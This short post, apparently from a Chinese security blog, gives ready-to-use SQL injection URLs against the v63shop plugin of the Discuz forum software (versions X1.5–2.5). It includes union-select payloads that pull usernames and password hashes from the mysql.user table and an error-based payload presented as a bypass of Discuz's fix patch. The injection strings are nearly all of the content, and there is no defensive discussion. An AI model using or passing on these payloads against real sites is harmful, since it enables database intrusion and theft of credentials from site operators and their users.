For Discuz X1.5-2.0
[php]
http://localhost/discuzx2/plugin.php?id=v63shop:goods&pac=info&gid=1 and 1=2 union /*!50000select*/ 1,2,3,4,5,6,concat(user,0x23,password),8,9,10,11,12,13 from mysql.user
[/php]
For Discuz X2.5
[php]
/discuz/plugin.php?id=v63shop:goods&pac=info&gid=@`'` union select @`'`,2,3,4,5,6,7,concat(host,0x3a,user),9,10,11,12,13,14 from mysql.user
[/php]
绕过Discuz修复补丁
[php]
http://localhost/discuz/plugin.php?id=v63shop:goods&pac=info&gid=`'` or @`''` union select 1 from (select count(*),concat((select database()),floor(rand(0)*2))a from information_schema.tables group by a)b where @`'`[/php]
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论